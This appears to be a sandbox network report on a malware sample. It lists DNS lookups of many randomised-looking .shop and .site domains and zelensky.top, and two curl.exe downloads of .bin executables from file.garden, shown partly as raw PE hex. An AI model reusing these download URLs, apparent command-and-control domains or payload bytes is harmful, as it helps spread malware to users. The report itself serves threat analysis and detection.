Sep 30, 2024 18:21:00.354989052 CEST	192.168.2.10	1.1.1.1	0x3788	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:06.777870893 CEST	192.168.2.10	1.1.1.1	0x9fc	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:11.511609077 CEST	192.168.2.10	1.1.1.1	0xb3d2	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:18.524677038 CEST	192.168.2.10	1.1.1.1	0x7854	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:45.815359116 CEST	192.168.2.10	1.1.1.1	0x44b3	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:56.017527103 CEST	192.168.2.10	1.1.1.1	0x8a60	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:22:06.255696058 CEST	192.168.2.10	1.1.1.1	0x334e	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:22:46.838383913 CEST	192.168.2.10	1.1.1.1	0x34f2	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:23:36.074611902 CEST	192.168.2.10	1.1.1.1	0xe53c	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:24:03.722990036 CEST	192.168.2.10	1.1.1.1	0x53e1	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:20:00.919317961 CEST	1.1.1.1	192.168.2.10	0xdb6c	No error (0)	file.garden		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:00.919317961 CEST	1.1.1.1	192.168.2.10	0xdb6c	No error (0)	file.garden		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.587315083 CEST	1.1.1.1	192.168.2.10	0xd3ce	Name error (3)	tiddymarktwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.730690956 CEST	1.1.1.1	192.168.2.10	0x69d7	Name error (3)	surveriysiop.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.791752100 CEST	1.1.1.1	192.168.2.10	0x36df	Name error (3)	captainynfanw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.882416010 CEST	1.1.1.1	192.168.2.10	0xf08d	Name error (3)	tearrybyiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.898658991 CEST	1.1.1.1	192.168.2.10	0xe217	Name error (3)	appleboltelwk.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.946209908 CEST	1.1.1.1	192.168.2.10	0x93bd	Name error (3)	tendencerangej.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.508163929 CEST	1.1.1.1	192.168.2.10	0x4476	Name error (3)	fossillargeiw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.535638094 CEST	1.1.1.1	192.168.2.10	0x43a	Name error (3)	coursedonnyre.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.590591908 CEST	1.1.1.1	192.168.2.10	0x3b13	Name error (3)	strappystyio.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.661875010 CEST	1.1.1.1	192.168.2.10	0x6dca	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:19.318198919 CEST	1.1.1.1	192.168.2.10	0xc6f2	No error (0)	offeviablwke.site		172.67.197.40	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:19.318198919 CEST	1.1.1.1	192.168.2.10	0xc6f2	No error (0)	offeviablwke.site		104.21.84.213	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:23.402647018 CEST	1.1.1.1	192.168.2.10	0x57fd	No error (0)	explorationmsn.store		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:23.402647018 CEST	1.1.1.1	192.168.2.10	0x57fd	No error (0)	explorationmsn.store		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.618031979 CEST	1.1.1.1	192.168.2.10	0xc7de	Name error (3)	famikyjdiag.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.718199015 CEST	1.1.1.1	192.168.2.10	0x7fd7	Name error (3)	possiwreeste.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.751950979 CEST	1.1.1.1	192.168.2.10	0x47ee	Name error (3)	commandejorsk.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.779009104 CEST	1.1.1.1	192.168.2.10	0x884e	No error (0)	underlinemdsj.site		104.21.1.169	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.779009104 CEST	1.1.1.1	192.168.2.10	0x884e	No error (0)	underlinemdsj.site		172.67.129.166	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.084053040 CEST	1.1.1.1	192.168.2.10	0x32c5	Name error (3)	bellykmrebk.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.141530991 CEST	1.1.1.1	192.168.2.10	0x1d61	Name error (3)	agentyanlark.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.204060078 CEST	1.1.1.1	192.168.2.10	0x8202	Name error (3)	writekdmsnu.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.332817078 CEST	1.1.1.1	192.168.2.10	0x94b9	Name error (3)	delaylacedmn.site	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.345108986 CEST	1.1.1.1	192.168.2.10	0x887c	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:56.483170033 CEST	1.1.1.1	192.168.2.10	0x7649	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:00.454200983 CEST	1.1.1.1	192.168.2.10	0x3788	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:07.120635033 CEST	1.1.1.1	192.168.2.10	0x9fc	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:11.520112991 CEST	1.1.1.1	192.168.2.10	0xb3d2	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:18.614612103 CEST	1.1.1.1	192.168.2.10	0x7854	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:45.904159069 CEST	1.1.1.1	192.168.2.10	0x44b3	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:21:56.107593060 CEST	1.1.1.1	192.168.2.10	0x8a60	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:22:06.345465899 CEST	1.1.1.1	192.168.2.10	0x334e	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:22:46.931672096 CEST	1.1.1.1	192.168.2.10	0x34f2	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:23:36.412744999 CEST	1.1.1.1	192.168.2.10	0xe53c	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:24:03.818559885 CEST	1.1.1.1	192.168.2.10	0x53e1	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

steamcommunity.com

offeviablwke.site

explorationmsn.store

underlinemdsj.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49708	188.114.97.3	443	8048	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:01 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/1/imxyvi.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:20:01 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:01 GMT Content-Type: application/octet-stream Content-Length: 233472 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Tue, 24 Sep 2024 14:17:45 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 524684 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOLw%2BVchxsBv223JL72Q%2B8MXyz7pnrdJhgKHPTgckyDq%2BnignZ0b91DFpHetOkrVUGnZaARrK1Jxd5FmqgTgVPZFh7dkd9VUugF1HDVWWqEAp%2BHPzZ%2FF2oHLtDEMJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb589b67825436d-EWR
2024-09-30 16:20:01 UTC	551	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 8e 91 8d 62 ef ff de 62 ef ff de 62 ef ff de 6b 97 6c de 70 ef ff de a1 6c fc df 66 ef ff de a1 6c fb df 68 ef ff de a1 6c fa df 43 ef ff de a1 6c fe df 64 ef ff de 29 97 fe df 69 ef ff de 62 ef fe de 79 ee ff de 71 6b f6 df 63 ef ff de 71 6b 00 de 63 ef ff de 71 6b fd df 63 ef ff de 52 69 63 68 62 ef ff de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$&bbbklplflhlCld)ibyqkcqkcqkcRichbPEd
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 60 2e 72 64 61 74 61 00 00 20 96 00 00 00 e0 02 00 00 98 00 00 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 3e 00 00 00 80 03 00 00 0c 00 00 00 64 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 48 18 00 00 00 c0 03 00 00 1a 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 e0 03 00 00 02 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 02 00 00 00 f0 03 00 00 04 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `.rdata @@.data>d@.pdataHp@@.rsrc@@.reloc4@B
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: c8 66 44 0f 6f 05 46 e6 02 00 45 0f 29 4b b8 66 44 0f 6f 0d d8 e6 02 00 66 0f 7f 44 24 20 44 8b 44 24 20 45 0f 29 53 a8 66 44 0f 6f 15 3f e6 02 00 66 0f 6e e1 8d 41 04 66 0f 70 e4 00 66 41 0f fe e0 66 0f 6f d4 66 0f 6f cc 66 0f 6a cc 66 0f 62 d4 66 0f 6f c1 66 0f 38 28 c5 66 0f 6f da 66 0f 38 28 ce 66 0f 38 28 d6 66 0f 38 28 dd 0f c6 d1 dd 66 0f 6f cc 0f c6 d8 dd 66 0f fa d4 66 0f fe dc 66 0f 72 e2 06 66 0f 6f c2 66 0f 72 e3 06 66 0f 72 d0 1f 66 0f fe c2 66 41 0f 38 40 c1 66 0f fa c8 66 0f 6f c3 66 0f 72 d0 1f 0f 54 cf 66 0f fe c3 66 0f 67 c9 66 41 0f 38 40 c2 66 0f fa e0 66 0f 67 c9 0f 54 e7 66 41 0f 6e c0 66 0f 67 e4 66 0f 67 e4 66 0f fc cc 66 0f 6e e0 66 0f fc c8 66 0f 70 e4 00 66 0f 6e 42 fc 66 41 0f fe e0 0f 57 c8 66 0f 6f d4 66 0f 7e 4a fc 66 0f 6f Data Ascii: fDoFE)KfDofD$ DD$ E)SfDo?fnAfpfAfofofjfbfof8(fof8(f8(f8(fofffrfofrfrffA8@ffofrTffgfA8@ffgTfAnfgfgffnffpfnBfAWfof~Jfo
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 00 48 8d 05 7f d0 02 00 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc 48 83 ec 28 48 8d 0d cd d0 02 00 ff 15 8f ca 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 40 48 8b 05 23 67 03 00 48 33 c4 48 89 44 24 30 48 8d 51 08 c6 44 24 28 01 48 8d 05 13 d0 02 00 48 8b d9 48 89 01 0f 57 c0 48 8d 05 03 d1 02 00 48 8d 4c 24 20 48 89 44 24 20 0f 11 02 ff 15 40 cb 02 00 48 8d 05 49 d6 02 00 48 89 03 48 8b c3 48 8b 4c 24 30 48 33 cc e8 ce 8f 02 00 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc 48 83 ec 48 48 8d 4c 24 20 e8 82 ff ff ff 48 8d 15 f3 33 03 00 48 8d 4c 24 20 e8 d5 9e 02 00 cc 40 53 48 83 ec 20 48 8b d9 48 8b c2 48 8d 0d 95 cf 02 00 0f 57 c0 48 8d 53 08 48 89 0b 48 8d 48 08 0f 11 02 ff 15 ce ca 02 00 48 8d 05 d7 d5 02 00 48 89 03 48 8b c3 48 Data Ascii: HHHH [H(H@SH@H#gH3HD$0HQD$(HHHWHHL$ HD$ @HIHHHL$0H3H@[HHHL$ H3HL$ @SH HHHWHSHHHHHHH
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 11 02 48 8d 4b 08 ff 15 5a c6 02 00 48 8d 05 5b d7 02 00 48 89 07 48 8b c7 0f 10 43 18 48 8b 5c 24 30 0f 11 47 18 48 83 c4 20 5f c3 cc cc 48 8b 09 e9 6c 85 02 00 cc cc cc cc cc cc cc cc 48 8d 05 69 cb 02 00 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 41 8b c8 48 8b da ff 15 e6 c4 02 00 0f 57 c0 49 c7 c0 ff ff ff ff 0f 11 03 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 90 49 ff c0 42 80 3c 00 00 75 f6 48 8b d0 48 8b cb e8 2b f3 01 00 48 8b c3 48 83 c4 30 5b c3 cc cc 40 53 48 83 ec 20 48 8b d9 f6 c2 01 74 0a ba 10 00 00 00 e8 78 8a 02 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 e1 ca 02 00 c3 cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 40 48 8b 05 1f 61 03 00 48 33 c4 48 89 44 24 38 48 8b da 48 89 54 24 28 Data Ascii: HKZH[HHCH\$0GH _HlHi@SH0AHWIHCHCIB<uHH+HH0[@SH HtxHH [HH\$WH@HaH3HD$8HHT$(
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 0c 02 00 8b c8 48 6b c1 1a 83 f8 15 77 1a 0f 1f 80 00 00 00 00 48 8b cf e8 d8 0c 02 00 8b c8 48 6b c1 1a 83 f8 16 72 ed 48 c1 e8 20 04 61 88 03 48 ff c3 48 3b de 75 c3 48 8b 5c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 58 0f 29 74 24 40 0f 28 f0 0f 54 05 5d d6 02 00 f2 0f 58 05 85 d5 02 00 0f 29 7c 24 30 44 0f 29 44 24 20 44 0f 28 c1 e8 fd 95 02 00 0f 28 f8 0f 28 c6 e8 fe 95 02 00 0f 28 f0 41 0f 28 c0 e8 da 95 02 00 f2 0f 59 f0 41 0f 28 c0 f2 0f 58 fe e8 cf 95 02 00 0f 28 74 24 40 f2 0f 5c f8 44 0f 28 44 24 20 0f 28 c7 0f 28 7c 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 41 56 48 83 ec 30 48 8b 05 c4 5b 03 00 48 33 c4 48 89 44 24 28 48 8b 19 48 8b ea Data Ascii: HkwHHkrH aHH;uH\$8Ht$@H _HX)t$@(T]X)\|$0D)D$ D((((A(YA(X(t$@\D(D$ ((\|$0HXH\$Hl$Ht$ AVH0H[H3HD$(HH
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 01 00 0f 10 45 00 0f 29 44 24 70 4c 8b c0 48 8d 54 24 70 48 8d 4c 24 20 e8 af f1 ff ff 48 83 78 18 0f 76 03 48 8b 00 48 8d 0d 36 c0 02 00 48 89 0b 0f 57 c0 0f 11 43 08 48 89 44 24 70 c6 44 24 78 01 48 8d 53 08 48 8d 4c 24 70 ff 15 63 bb 02 00 48 8d 05 a4 cb 02 00 48 89 03 48 8b 54 24 38 48 83 fa 0f 76 35 48 ff c2 48 8b 4c 24 20 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 a7 bc 02 00 cc e8 e1 7f 02 00 0f 10 45 00 0f 11 43 18 48 8d 05 92 c3 02 00 48 89 03 48 8d 4b 28 48 8b d6 e8 e3 fd ff ff 90 0f 57 c0 0f 11 43 58 0f 11 43 48 33 c0 48 89 43 58 48 c7 43 60 07 00 00 00 66 89 43 48 0f 11 44 24 20 66 0f 6f 0d e8 cf 02 00 f3 0f 7f 4c 24 30 66 89 44 24 20 48 8b 43 08 48 8d 0d ba bf 02 00 48 85 c0 48 0f Data Ascii: E)D$pLHT$pHL$ HxvHH6HWCHD$pD$xHSHL$pcHHHT$8Hv5HHL$ HHrH'HIH+HHvECHHHK(HWCXCH3HCXHC`fCHD$ foL$0fD$ HCHHH
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: c8 e8 1d 7b 02 00 48 8d 05 fe ba 02 00 48 89 73 38 48 c7 43 40 07 00 00 00 48 8d 4b 08 66 89 73 28 48 89 03 ff 15 f1 b5 02 00 40 f6 c7 01 74 0d ba 88 00 00 00 48 8b cb e8 e6 7a 02 00 48 8b 74 24 40 48 8b c3 48 8b 5c 24 38 48 83 c4 20 5f c3 ff 15 8d b7 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 57 48 83 ec 20 48 8b 91 80 00 00 00 48 8b d9 48 83 fa 0f 76 31 48 8b 49 68 48 ff c2 48 81 fa 00 10 00 00 72 1c 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f 87 d8 00 00 00 49 8b c8 e8 75 7a 02 00 33 ff 48 c7 83 80 00 00 00 0f 00 00 00 48 89 7b 78 40 88 7b 68 48 8b 53 60 48 83 fa 07 76 36 48 8b 4b 48 48 8d 14 55 02 00 00 00 48 81 fa 00 10 00 00 72 1c 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f 87 83 00 00 00 49 8b c8 e8 Data Ascii: {HHs8HC@HKfs(H@tHzHt$@HH\$8H _H\$WH HHHv1HIhHHrLAH'I+HAHIuz3HH{x@{hHS`Hv6HKHHUHrLAH'I+HAHI
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 83 c4 30 41 5e c3 cc cc cc cc 40 53 48 83 ec 20 48 8d 05 6b c3 02 00 48 8b d9 48 89 01 f6 c2 01 74 0a ba 38 00 00 00 e8 9e 75 02 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc 48 3b ca 0f 84 d6 00 00 00 48 89 6c 24 18 48 89 74 24 20 57 48 83 ec 20 48 89 5c 24 30 49 8b f8 4c 89 74 24 38 48 8b ea 45 33 f6 48 8b f1 66 90 48 85 f6 0f 84 8d 00 00 00 8b 56 08 83 ea 0a 74 6a 83 ea 01 74 65 83 ea 05 74 32 83 ea 02 74 19 83 fa 01 75 64 48 3b 7e 20 75 5e 83 7f 34 ff 75 03 89 57 34 49 8b fe eb 50 48 85 ff 74 0a 44 89 77 34 44 89 76 34 eb 41 48 8b fe eb 3c 48 85 ff 74 04 44 89 77 34 48 8b 5e 28 48 85 db 74 2a 90 48 8b 53 20 4c 8b c7 48 8b 4b 10 e8 60 ff ff ff 48 8b 5b 28 48 85 db 75 e7 eb 0e 48 8b 4e 20 45 33 c0 33 d2 e8 47 ff ff ff 48 8b 76 10 48 3b f5 0f 85 6a ff ff Data Ascii: 0A^@SH HkHHt8uHH [H;Hl$Ht$ WH H\$0ILt$8HE3HfHVtjtet2tudH;~ u^4uW4IPHtDw4Dv4AH<HtDw4H^(Ht*HS LHK`H[(HuHN E33GHvH;j
2024-09-30 16:20:01 UTC	1369	IN	Data Raw: 00 ca 9a 3b 48 69 c2 00 36 6e 01 48 2b c8 48 69 c9 00 ca 9a 3b 49 8b c6 48 f7 e9 48 03 d1 48 c1 fa 18 48 8b c2 48 c1 e8 3f 48 03 c2 49 03 c0 eb 1b 48 99 48 f7 ff 48 69 c8 00 ca 9a 3b 48 69 c2 00 ca 9a 3b 48 99 48 f7 ff 48 03 c1 48 3b c3 0f 8d 64 09 00 00 89 74 24 28 0f 1f 84 00 00 00 00 00 44 8b 65 80 41 0f ba fc 1f 44 89 64 24 40 44 8b 6d 84 41 0f ba fd 1f 45 2b ec 48 8d 4d 60 41 83 fd ff 75 1c e8 07 f7 01 00 41 8d 75 01 45 8b fc 48 8d 4d 60 e8 f7 f6 01 00 8b c8 e9 a7 00 00 00 41 8d 7d 01 e8 e7 f6 01 00 44 8b f7 8b c8 49 0f af ce 8b c7 3b cf 73 23 f7 d8 33 d2 f7 f7 8b f2 8b c7 3b ca 73 15 48 8d 4d 60 e8 c1 f6 01 00 8b c8 49 0f af ce 3b ce 72 ed eb 02 8b f8 45 8b f4 48 8d 4d 60 e8 a7 f6 01 00 8b d7 48 89 54 24 38 8b c8 48 0f af ca 8b f7 45 8b fc 3b cf 73 Data Ascii: ;Hi6nH+Hi;IHHHHH?HIHHHi;Hi;HHHH;dt$(DeADd$@DmAE+HM`AuAuEHM`A}DI;s#3;sHM`I;rEHM`HT$8HE;s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49711	188.114.97.3	443	7196	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:10 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:20:10 UTC	812	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:10 GMT Content-Type: application/octet-stream Content-Length: 370176 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Sun, 22 Sep 2024 19:01:04 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 681453 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgEy%2BVgElZa95RxrinVgHIHFYgL37s1gUjl8eX9ltgNYiaJ9gTY3gjVXIIR7vSG%2FgLGYTcDJXTlqbcUnsWfbvb54meUIN5bZDvSw2h9uPLD1Lhtjb4VRoYCjNQAtPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb589eb28b219cf-EWR
2024-09-30 16:20:10 UTC	557	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 b2 3f f9 71 Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ\|m&.y;KR7Skm?8ID&!0%N!\\L^0\j\|MM;qUO!'%. dEuQ-w$IX0df$\|(gEN3JT?q
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 d2 f4 39 88 Data Ascii: [5CX",_:k$J48Q3e,\|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%89
